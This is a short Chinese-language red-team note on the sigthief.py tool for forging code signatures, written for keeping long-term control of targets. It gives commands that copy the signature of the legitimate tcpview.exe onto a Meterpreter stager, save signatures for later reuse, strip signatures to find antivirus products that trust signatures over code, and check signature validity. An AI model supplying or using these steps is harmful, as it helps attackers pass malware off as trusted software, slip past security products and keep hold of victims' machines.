伪造签名工具
在实战中,尤其是需要长期控制的目标,除免杀对抗安全软件以外,还需考虑人为无 意查看恶意文件,如数字签名是否拥有。而许多安全软件,又仅仅验证是否有签名,而非验 证签名是否有效。
从二进制文件获得签名并将其添加到另一个二进制文件
./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe
将签名保存到磁盘供以后使用
./sigthief.py -i tcpview.exe -r #ouputfile tcpview.exe_sig
#使用保存的签名数据签名
./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe
#删除签名 帮助找到重视签名而不是代码的AV
./sigthief.py -i tcpview.exe -T
#检测签名的有效性
./sigthief.py -i tcpview.exe -c
证书中所有信息一致 ,类似于程序被篡改证书失效